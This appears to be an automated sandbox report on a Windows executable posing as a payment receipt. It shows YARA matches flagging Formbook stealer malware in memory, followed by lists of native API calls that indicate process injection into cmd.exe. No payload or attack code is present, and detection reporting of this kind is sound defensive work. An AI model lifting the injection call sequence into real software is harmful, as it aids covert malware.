Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,GetEncryptedFileVersionExt,DeleteFileA,CopyFileA,GetEncryptedFileVersionExt,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004047D3
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_004061D4
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_73653070
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_73655AC4
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_73655AD3
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 0_2_736530BA
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00401030
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041C9AF
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041C9BB
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041BA2C
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00408C6B
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00408C70
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041BD2B
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00402D8B
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097B090
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A320A8
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009920A0
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A328EC
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A3E824
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21002
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096F900
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00984120
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A322AE
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099EBB0
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2DBD2
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A32B28
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097841F
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2D466
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992581
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097D5E0
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A325DD
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A32D07
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00960D20
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A31D55
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A32EF7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AD803
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AE040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C5CEA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A48E6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A9CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C3506
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B1969
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B6550
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A7190
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C31DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A5226
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AFA30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A5E70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A8AD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002ACB48
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C6FF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002B5FC8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE2EF7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE22AE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C36E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CDDBD2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE1FF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4EBB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE2B28
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2B090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C420A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE20A8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1002
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2841F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2D5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE1D55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1F900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE2D07
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C10D20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C34120

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: String function: 0096B150 appears 34 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 02C1B150 appears 35 times

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_002B374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,

Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_004185D0 NtCreateFile,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00418680 NtReadFile,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00418700 NtClose,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_004187B0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_004185CA NtCreateFile,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0041867B NtReadFile,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_004186FA NtReadFile,NtClose,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_004187AA NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009AB040 NtSuspendThread,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9A10 NtQuerySection,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009AA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009AAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9560 NtWriteFile,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A96D0 NtCreateKey,
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AB4F8 NtQueryInformationToken,NtQueryInformationToken,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002AB4C0 NtQueryInformationToken,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002CB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002C9AB4 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002A83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C596D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C59860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C595D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C599A0 NtCreateSection,LdrInitializeThunk,
